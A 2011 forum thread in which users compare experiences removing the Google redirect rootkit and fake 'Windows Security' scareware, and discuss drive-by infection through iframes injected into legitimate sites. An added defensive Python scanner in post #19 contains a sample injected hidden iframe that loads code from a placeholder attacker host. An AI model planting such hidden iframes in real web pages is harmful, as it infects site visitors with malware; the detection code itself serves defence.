#1
Coordinator
Join Date: Jul 2003
Location: Here and There
Google Re-direct Virus?
Anyone have any experience with this? My computer has it. Apparently it's a real pain to remove and involves editing / deleting Windows root files and registry settings. I'm technically capable, but wanted to see if anyone had gone through this process before and had any advice or an easier way before I start stripping out Windows system files. Thanks in advance!

#2
Mascot
Join Date: Oct 2000
Location: Ohio
My Thinkpad caught this one. I was able to remove it by following instructions at bleepingcomputer.com
I've used that website a few times to remove different viruses.

#3
Hall Of Famer
Join Date: Dec 2003
Location: the yo'
Had this motherfucker the other day. I think this was what I used: How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller

#4
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
I heartily second the endorsement of bleepingcomputer.com walkthroughs.
Saved my ass from a nasty virus last Sunday night & then saved me again from a less painful version last night. The tools are linked for d'loading, the walkthroughs are not quite idiot level but they're close enough (thank God). Meanwhile I'm wondering why the hell my Avast has gone 0-2 on consecutive Sunday nights.
__________________
"I lit another cigarette. Unless I specifically inform you to the contrary, I am always lighting another cigarette." - from a novel by Martin Amis
Last edited by JonInMiddleGA : 07-11-2011 at 10:49 AM.

#5
Coordinator
Join Date: Dec 2004
Location: San Diego via Sausalito via San Jose via San Diego
Was it a home or an away game? Natural grass or astroturf?
__________________
I'm no longer a Chargers fan, they are dead to me
Coming this summer to a movie theater near you: The Adventures of Jedikooter: Part 4

#6
College Starter
Join Date: Oct 2000
I also got the nasty bug on Saturday, and my Avast also whiffed. fwiw, I absolutely support torture for the asshats who write & disseminate these trojans.
__________________
...

#7
Grizzled Veteran
Join Date: Sep 2003
Location: Fresno, CA

#8
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
That's the damnable thing ... unless it was a time released virus, both incidents have occurred well outside the porn time zone.

#9
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
Fake "Windows Security" bug?

#10
College Starter
Join Date: Oct 2000

#11
Hall Of Famer
Join Date: Dec 2003
Location: the yo'
The fake Windows Security bug was the same as the Google redirect, I think? I know I had both on different machines. I think we need to better utilize black ops troops to fix the people that make these problems.

#12
College Benchwarmer
Join Date: Oct 2003
Don't have the bug but d'loaded the fix stevew linked just in case I need it.
Is this something NoScript would block? How about WinPatrol? Anyone know if it gets around the warnings that something is trying to be installed?

#13
Hall Of Famer
Join Date: Dec 2002
Location: Mass.
Yes, NoScript would block it if you didn't have it set to trust the site that the malicious web code would come from. Same with people who don't use Firefox/NoScript: they could block this if they disabled scripting in their browser, but then to them many webpages would look "broken" most likely, so NoScript is a more graceful approach. If people use NoScript but blindly trust everything, or globally run scripting, they basically make NoScript worthless. Also, by default NoScript does not block iframes, so you need to enable that, as most of these infections occur using iframes on legitimate websites. As for WinPatrol, hypothetically it -should- protect against it, but that depends more on how you have WinPatrol set up, most likely. Running WinPatrol or a similar product is a good idea, but the best way to protect against these types of attacks is blocking scripting/iframes in your browser.

#14
College Benchwarmer
Join Date: Oct 2003
Thanks. I don't even have FOFC on trusted, and per your advice in other threads iframes are blocked too. When I surf I only use the "temporarily allow" options in NoScript. I had a bad virus years ago and it took me a day and a half screwing around at ComputerCops with HijackThis to get rid of it. Since then I've been very conscious of where I go and what I allow. I'm sure at some time I'll get bit again but for now, for me, paranoid is better!

#15
High School JV
Join Date: Apr 2003
Location: Akron, OH

#16
Coordinator
Join Date: Oct 2000
ComboFix

#17
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
Based on the hell I went through to fix the variant last weekend, it depends upon the variant. For example, the one I got 8 days ago overrode all displays while giving scary warning messages about hard disk errors, bad sectors, etc. It went so far as to hide certain files/file types to make it appear as though you had serious data loss. In the end there were over 300 different images associated with the virus, each with a different "windows message" warning you about the (fake) problems.

When the hell this thing installed, how the hell it installed without me ever seeing it/approving it, etc ... no clue. Considering how often I'm prompted to verify installation/overwriting, etc. etc., I would have thought this would have been next to impossible w/out the user (i.e. me) taking some action, but apparently that isn't the case.

The version I got last night was simpler & less scary but no less troublesome as a user. It did something in the registry that prevented virtually any executable from running. No web browser, no anti-viral, no d'loading, nothing. It basically blocked any operation (on Win XP) other than popping up a full screen "windows message" warning me that I was at risk & needed to purchase/install a "Windows Security" program. After getting through all the fixes & sitting through the 3 hours it takes for Malwarebytes to run a full scan, it was a total of 7 files/registry entries (including one java file in my web temp folder that I would guess was tied to the origin of the virus). Once again, no clue where/how/when the trojan came from, got installed, etc.

Oddly enough, both incidents reared their heads on Sunday night around 11pm. Now either they both were "time-released" (or whatever the terminology) for the same time OR I got them from a major newspaper website, since that's where I was when I discovered the one last night & where I had been a relatively short time before the problem emerged the previous week.

#18
College Starter
Join Date: Oct 2000
That's exactly where I was when I got it on Saturday - some British tabloid linked from Drudge. At least that's where I was when all hell broke loose.

#19
Hall Of Famer
Join Date: Dec 2002
Location: Mass.
Because the gross majority of web users do not block scripting in their browsers, this is the most common method of infecting systems these days (several million infections every day). The hackers now actually spend time trying to hack legitimate websites (such as CNN, Wall Street Journal, etc.) to slip in code that is usually not even visible (via iframe). Then when your browser hits that site, it unknowingly also downloads the rogue code and, if your system is not properly patched or protected against it, will then infect your system. Several months ago, even FOFC was infecting people through this means: what the hackers did was inject the attack into one of the advertisements on the top of our boards. So it wouldn't surprise me at all if you got something from a major website these days; the list of major companies and sites attacked in this manner is enormous.
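Added example, not code from the thread or from any tool named in it: a defender-side check a site owner can run over their own pages to spot the kind of invisible iframe injection described in the post above and in #13 (iframes slipped into a legitimate page, sized 1x1 or hidden by CSS, loading code from a third-party host). The HTML sample and all hostnames are constructed, and `trusted_hosts` is a hypothetical allow-list of the ad/embed domains the page legitimately uses.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not a real site): one legitimate ad iframe plus an injected,
# hidden 1x1 iframe that loads code from a placeholder third-party host.
SAMPLE_HTML = """
<html><body>
<h1>Front page</h1>
<iframe src="https://ads.example-site.test/slot1" width="300" height="250"></iframe>
<p>story text</p>
<iframe src="http://evil.example.test/in.php" width="1" height="1" style="visibility: hidden"></iframe>
</body></html>
"""

class IframeCollector(HTMLParser):  # collects the attributes of every <iframe> start tag
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def _is_tiny(value):
    m = re.match(r"\s*(\d+)", value)  # "0", "1", "1px": typical hidden-frame sizes
    return m is not None and int(m.group(1)) <= 1

def find_suspicious_iframes(html, trusted_hosts):
    """Return [(src, [reasons])] for iframes that are hidden or load from an untrusted host."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for f in parser.iframes:
        reasons = []
        style = f.get("style", "").replace(" ", "").lower()
        if _is_tiny(f.get("width", "")) or _is_tiny(f.get("height", "")):
            reasons.append("tiny-dimensions")
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden-by-css")
        host = urlparse(f.get("src", "")).hostname or ""
        if host and host not in trusted_hosts:  # hypothetical allow-list of embed domains
            reasons.append("untrusted-host:" + host)
        if reasons:
            findings.append((f.get("src", ""), reasons))
    return findings

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_HTML, {"ads.example-site.test"}):
        print(src, "->", ", ".join(why))
```

Run it against the saved HTML of your own front page; a frame that trips the size or CSS heuristics and points at a host you never added is the thing to investigate first.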

#20
College Benchwarmer
Join Date: Apr 2008
Location: Sterling Heights, Mi
I've seen the "Windows Security" quite a bit this year. My wife got it on her laptop and I have fixed it on a couple of my friends' computers. Combination of following the steps on bleepingcomputer and malwarebytes seems to do the job.
As a side note, all of these computers had anti-virus on them; none of them caught it. A couple of the computers had Microsoft Security Essentials, 1 had Avast!, one had AVG Free Edition, and one had McAfee.
Last edited by fantom1979 : 07-11-2011 at 06:54 PM.

#21
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
Okay, that part I kind of get/knew already. What has me thrown is that, in my mind at least, the point to that method would be infecting on a larger scale. Considering all the things people complain very loudly about, I'm having a tough time picturing ajc.com being used for virus delivery without hearing something about it somewhere. Hell, that's the kind of thing I figure would produce three FB pages, a Twitter feed, and two websites just to protest it. (Just explaining why I've previously discounted them in spite of being the most obvious suspect because of proximity of visit to infection).

#22
Grizzled Veteran
Join Date: Jul 2001
Location: St. Louis
I got this mother fucker a few weeks ago also. Wonder if maybe it isn't from those FOFC ads?
It was a work laptop so I wasn't anywhere unsafe with it. I had also just backed up my data so I just had the computer guy reinstall Windows.
Last edited by panerd : 07-11-2011 at 11:03 PM.

#23
Hall Of Famer
Join Date: Nov 2000
Location: Behind Enemy Lines in Athens, GA
Only if it can be delivered by those even if we never see them.

#24
High School JV
Join Date: Apr 2003
Location: Akron, OH
This is the one that popped up on me. I saw it doing its "fake" scan and must have stopped it before a virus was actually installed.